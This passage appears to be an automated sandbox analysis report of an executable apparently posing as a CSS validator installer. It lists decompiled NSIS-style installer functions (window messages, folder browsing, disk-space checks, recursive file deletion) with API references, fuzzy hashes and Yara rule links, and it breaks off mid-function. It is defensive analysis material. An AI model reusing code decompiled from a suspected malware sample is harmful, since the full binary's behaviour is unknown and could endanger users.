Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: 0f83f4d47d9459a9b0ba24ed2798b341cbbd10940215494d2392ac534f962254
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: 41E08C3220025AABCF10AFA08C04EEB3B6CEF00360F008833FA15E7050D630E8219BA8

Uniqueness

Uniqueness Score: -1.00%

Function 004041C7, Relevance: 1.5, APIs: 1, Instructions: 9
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004041C7(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x42ebf8; // 0x303a4
				if(_t2 != 0) {
					_t3 = SendMessageA(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}

0x004041c7
0x004041ce
0x004041d9
0x00000000
0x004041d9
0x004041df

APIs

SendMessageA.USER32 ref: 004041D9

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: b93bfa62a0d17583d47994c5deeb5958d6a7eb45b0bac583054f51af99654720
Instruction ID: 4f5bfb943ccb7372f266285400f959559a3f08b639bcfa815988f1d16fb7a589
Opcode Fuzzy Hash: b93bfa62a0d17583d47994c5deeb5958d6a7eb45b0bac583054f51af99654720
Instruction Fuzzy Hash: A5C09BB17447017FEE20CB659D49F0777586750700F2544397755F60D4C674E461D61C

Uniqueness

Uniqueness Score: -1.00%

Function 00403300, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403300(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x0040330e
0x00403314

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,?), ref: 0040330E

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D

Uniqueness

Uniqueness Score: -1.00%

Function 004041B0, Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004041B0(int _a4) {
				long _t2;

				_t2 = SendMessageA( *0x42f428, 0x28, _a4, 1); // executed
				return _t2;
			}

0x004041be
0x004041c4

APIs

SendMessageA.USER32 ref: 004041BE

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 52ed36bf426171ca8e77ff219833bebd4cd9702e05723d5fb87fa54f4c2163d0
Instruction ID: 1318e1a831b13f4a694e23e2858010ee9933afb9cbbae162fbad06e3603bfc21
Opcode Fuzzy Hash: 52ed36bf426171ca8e77ff219833bebd4cd9702e05723d5fb87fa54f4c2163d0
Instruction Fuzzy Hash: A9B09236284A00ABDA215B50DE09F4A7A72A768701F408039B240250B0CAB200A5EB18

Uniqueness

Uniqueness Score: -1.00%

Function 0040419D, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040419D(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x42a88c, _a4); // executed
				return _t2;
			}

0x004041a7
0x004041ad

APIs

KiUserCallbackDispatcher.NTDLL(?,00403F79), ref: 004041A7

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 79f4c344832d221aace4b62902680fcbf7870811690861caeb07dff72c7a6dc1
Instruction ID: f9921b4c88a1a0ed6e9c6eedf741b01f94502565facb500019f25752580a62db
Opcode Fuzzy Hash: 79f4c344832d221aace4b62902680fcbf7870811690861caeb07dff72c7a6dc1
Instruction Fuzzy Hash: C5A011B2000000AFCB02AB00EF08C0ABBA2ABA0300B008838A280800388B320832EB0A

Uniqueness

Uniqueness Score: -1.00%

Function 00401F7B, Relevance: 1.3, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00401F7B() {
				void* _t8;
				void* _t12;
				void* _t14;
				void* _t16;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402BCE(_t14);
				E0040521E(0xffffffeb, _t6); // executed
				_t8 = E00405796(_t19); // executed
				_t20 = _t8;
				if(_t20 == _t14) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x20)) != _t14) {
						_t12 = E00406575(_t16, _t20);
						if( *((intOrPtr*)(_t22 - 0x24)) < _t14) {
							if(_t12 != _t14) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E00406055(_t17, _t12);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}

0x00401f81
0x00401f86
0x00401f8c
0x00401f91
0x00401f95
0x004027bf
0x00401f9b
0x00401f9e
0x00401fa1
0x00401fa9
0x00401fb6
0x00401fb8
0x00401fb8
0x00401fab
0x00401fad
0x00401fad
0x00401fa9
0x00401fbf
0x00401fc0
0x00401fc0
0x00402a5d
0x00402a69

APIs

Part of subcall function 0040521E: lstrlenA.KERNEL32(Completed,00000000,00421FFD,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,Completed,00000000,00421FFD,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
Part of subcall function 0040521E: lstrcatA.KERNEL32(Completed,00403233,00403233,Completed,00000000,00421FFD,7519EA30), ref: 0040527A
Part of subcall function 0040521E: SetWindowTextA.USER32(Completed,Completed), ref: 0040528C
Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052B2
Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052CC
Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052DA

Part of subcall function 00405796: CreateProcessA.KERNELBASE ref: 004057BF
Part of subcall function 00405796: CloseHandle.KERNEL32(?), ref: 004057CC

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FC0

Part of subcall function 00406575: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406586
Part of subcall function 00406575: GetExitCodeProcess.KERNEL32 ref: 004065A8

Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: baec25d5bd2dfe6d55721a489fba1732094f7a4d61ef90c6e2c4752007c8309d
Instruction ID: 93961662e530d2e5a08160df11036b73ffef590b917d11c16f189fde5a143e01
Opcode Fuzzy Hash: baec25d5bd2dfe6d55721a489fba1732094f7a4d61ef90c6e2c4752007c8309d
Instruction Fuzzy Hash: 88F09032A05021EBCB20BBA15E84DAFB2B5DF01318B21423FF502B21D1DB7C4D425A6E

Uniqueness

Uniqueness Score: -1.00%

Function 00403830, Relevance: 1.3, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403830() {
				void* _t1;
				signed int _t6;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
					_t6 =  *0x40a018;
				}
				E00403875();
				return E004058BF(_t6, 0x436800, 7);
			}

0x00403830
0x00403838
0x0040383b
0x00403841
0x00403841
0x00403841
0x00403848
0x00403859

APIs

CloseHandle.KERNEL32(FFFFFFFF,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 83a8e34a36ec992e53eb10e28b6b1173665ca16798591da3225f5f7867e87012
Instruction ID: 504de9a345f4e041b5d785333e0db00fbf57b3530eebac313f647de5124f4253
Opcode Fuzzy Hash: 83a8e34a36ec992e53eb10e28b6b1173665ca16798591da3225f5f7867e87012
Instruction Fuzzy Hash: D3C01231540704B6D1247F759D4F9093A58AB45736B608775B0F5B00F1D73C8669456D

Uniqueness

Uniqueness Score: -1.00%

Function 00405ABA, Relevance: 1.3, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405ABA(CHAR* _a4, intOrPtr _a8) {
				CHAR* _t3;
				char _t4;

				_t3 = _a4;
				while(1) {
					_t4 =  *_t3;
					if(_t4 == 0) {
						break;
					}
					if(_t4 != _a8) {
						_t3 = CharNextA(_t3); // executed
						continue;
					}
					break;
				}
				return _t3;
			}

0x00405aba
0x00405acd
0x00405acd
0x00405ad1
0x00000000
0x00000000
0x00405ac4
0x00405ac7
0x00000000
0x00405ac7
0x00000000
0x00405ac4
0x00405ad3

APIs

CharNextA.USER32(?,00403455,"C:\Users\user\Desktop\yRqHWQ91dT.exe" ,00000020,"C:\Users\user\Desktop\yRqHWQ91dT.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00405AC7

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: 1083c57b7f4745178c71a6651c3ca9c923e8efe26efc9521b350556c87d1c9f6
Instruction ID: e7db52908d3e8830c535cfb70526cc2daabbcaa08dbe50b4a99c3e39ed970d4a
Opcode Fuzzy Hash: 1083c57b7f4745178c71a6651c3ca9c923e8efe26efc9521b350556c87d1c9f6
Instruction Fuzzy Hash: 00C08030208F8057CB10571091644677FF0FAD1700F7C496BF0C163150D13458408F36

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040460D, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040460D(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;
				void* _t205;

				_t156 = __edx;
				_t82 =  *0x42a068; // 0x60b0e4
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x430000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E004057F7(0x3fb, _t146);
					E004063D2(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004057F7(0x3fb, _t146);
							if(E00405B7D(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E004060F7(0x429860, _t146);
							_t87 = E00406500(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E004060F7(0x429860, _t146);
								_t89 = E00405B28(0x429860);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x429860,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x429860) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x429860,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405AD6(0x429860);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x429860) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404AA1(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42ebfc; // 0x60b8d8
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404A89(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x429850);
									} else {
										E004049C4(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42f4e4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E0040419D(0 | _v8 == _t158);
								if(_v8 == _t158) {
									_t205 =  *0x42a880 - _t158; // 0x0
									if(_t205 == 0) {
										E00404566();
									}
								}
								 *0x42a880 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x42a890;
							_v60 = E0040495E;
							_v56 = _t146;
							_v68 = E0040618A(_t146, 0x42a890, _t166, 0x429c68, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405A8F(_t146);
								_t125 =  *((intOrPtr*)( *0x42f434 + 0x11c));
								if( *((intOrPtr*)( *0x42f434 + 0x11c)) != 0 && _t146 == "C:\\Users\\alfons\\AppData\\Local\\Temp\\CssValidatorInstallerTemp") {
									E0040618A(_t146, 0x42a890, _t166, 0, _t125);
									if(lstrcmpiA(0x42e3c0, 0x42a890) != 0) {
										lstrcatA(_t146, 0x42e3c0);
									}
								}
								 *0x42a880 =  *0x42a880 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					} else {
						_a8 = 0x40f;
						goto L12;
					}
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405AFC(_t146) != 0 && E00405B28(_t146) == 0) {
						E00405A8F(_t146);
					}
					 *0x42ebf8 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E0040417B(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E0040417B(_t166);
					E004041B0(_t165);
					_t138 = E00406500(8);
					if(_t138 == 0) {
						L53:
						return E004041E2(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}

0x0040460d
0x00404613
0x00404619
0x00404626
0x00404634
0x00404637
0x0040463f
0x00404645
0x00404645
0x00404651
0x00404654
0x004046c2
0x004046c9
0x004047a0
0x004047a7
0x004047b6
0x004047b6
0x004047ba
0x004047c4
0x004047d1
0x004047d3
0x004047d3
0x004047e1
0x004047e8
0x004047ef
0x004047f2
0x00404829
0x0040482b
0x00404831
0x00404836
0x0040483a
0x0040483c
0x0040483c
0x00404858
0x00000000
0x0040485a
0x0040485d
0x0040486b
0x00404871
0x00404872
0x00404875
0x00404878
0x00000000
0x00404878
0x004047f4
0x004047f6
0x004047fa
0x00000000
0x00000000
0x00000000
0x00000000
0x004047fc
0x004047fc
0x00404809
0x0040480e
0x00000000
0x00000000
0x00404812
0x00404814
0x00404814
0x0040481c
0x0040481e
0x00404821
0x00404824
0x00404827
0x00000000
0x00000000
0x00000000
0x00000000
0x00404827
0x00404884
0x0040488e
0x00404891
0x00404894
0x0040489b
0x0040489b
0x0040489d
0x0040489d
0x004048a2
0x004048a4
0x004048ac
0x004048b3
0x004048b5
0x004048c0
0x004048c0
0x004048b5
0x004048c7
0x004048d0
0x004048da
0x004048e2
0x004048fd
0x004048e4
0x004048ed
0x004048ed
0x004048e2
0x00404902
0x00404907
0x0040490c
0x00404915
0x00404915
0x0040491e
0x00404920
0x00404920
0x0040492c
0x00404934
0x00404936
0x0040493c
0x0040493e
0x0040493e
0x0040493c
0x00404943
0x00000000
0x00404943
0x004047f2
0x004047a9
0x004047b0
0x00000000
0x00000000
0x00000000
0x004047b0
0x004046cf
0x004046d8
0x004046f2
0x004046f7
0x00404701
0x00404708
0x00404714
0x00404717
0x0040471a
0x00404721
0x00404729
0x0040472c
0x00404730
0x00404737
0x0040473f
0x00404799
0x00404741
0x00404742
0x00404749
0x00404753
0x0040475b
0x00404768
0x0040477c
0x00404780
0x00404780
0x0040477c
0x00404785
0x00404792
0x00404792
0x0040473f
0x00000000
0x004046f7
0x004046e5
0x00000000
0x004046eb
0x004046eb
0x00000000
0x004046eb
0x00404656
0x00404663
0x0040466c
0x00404679
0x00404679
0x00404680
0x00404686
0x0040468f
0x00404692
0x00404695
0x0040469d
0x004046a0
0x004046a3
0x004046a9
0x004046b0
0x004046b7
0x00404949
0x0040495b
0x004046bd
0x004046c0
0x00000000
0x004046c0
0x004046b7

APIs

GetDlgItem.USER32 ref: 0040465C
SetWindowTextA.USER32(00000000,?), ref: 00404686
SHBrowseForFolderA.SHELL32(?,00429C68,?), ref: 00404737
CoTaskMemFree.OLE32(00000000), ref: 00404742
lstrcmpiA.KERNEL32(: Completed,Name Setup: Completed,00000000,?,?), ref: 00404774
lstrcatA.KERNEL32(?,: Completed), ref: 00404780
SetDlgItemTextA.USER32 ref: 00404792

Part of subcall function 004057F7: GetDlgItemTextA.USER32 ref: 0040580A

Part of subcall function 004063D2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\yRqHWQ91dT.exe" ,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
Part of subcall function 004063D2: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
Part of subcall function 004063D2: CharNextA.USER32(?,"C:\Users\user\Desktop\yRqHWQ91dT.exe" ,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
Part of subcall function 004063D2: CharPrevA.USER32(?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C

GetDiskFreeSpaceA.KERNEL32(00429860,?,?,0000040F,?,00429860,00429860,?,00000001,00429860,?,?,000003FB,?), ref: 00404850
MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040486B

Part of subcall function 004049C4: lstrlenA.KERNEL32(Name Setup: Completed,Name Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
Part of subcall function 004049C4: wsprintfA.USER32 ref: 00404A6A
Part of subcall function 004049C4: SetDlgItemTextA.USER32 ref: 00404A7D

Strings

C:\Users\user\AppData\Local\Temp\CssValidatorInstallerTemp, xrefs: 0040475D
A, xrefs: 00404730
: Completed, xrefs: 0040476E, 00404773, 0040477E
Name Setup: Completed, xrefs: 0040470A, 0040476D

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: : Completed$A$C:\Users\user\AppData\Local\Temp\CssValidatorInstallerTemp$Name Setup: Completed
API String ID: 2624150263-2687600269
Opcode ID: e2093240277334122aeb027a85fba7e6720a3e9e52d6b68153c58a68e5512187
Instruction ID: 02b07c61478aeb9ac600f99876a590f4236d4304051c708c1213a6c52027fc1c
Opcode Fuzzy Hash: e2093240277334122aeb027a85fba7e6720a3e9e52d6b68153c58a68e5512187
Instruction Fuzzy Hash: CAA16FB1900209ABDB11EFA6DD45AAF77B8EF84314F14843BF601B62D1DB7C89418B69

Uniqueness

Uniqueness Score: -1.00%

Function 004058BF, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E004058BF(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405B7D(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73);
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x42f4c8 =  *0x42f4c8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E004060F7(0x42b898, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405AD6(_t73);
					} else {
						lstrcatA(0x42b898, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]);
						_t40 = FindFirstFileA(0x42b898,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405ABA( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E004060F7(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E00405877(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E0040521E(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x42f4c8 =  *0x42f4c8 + 1;
										} else {
											E0040521E(0xfffffff1, _t73);
											E00405ED6(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004058BF(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
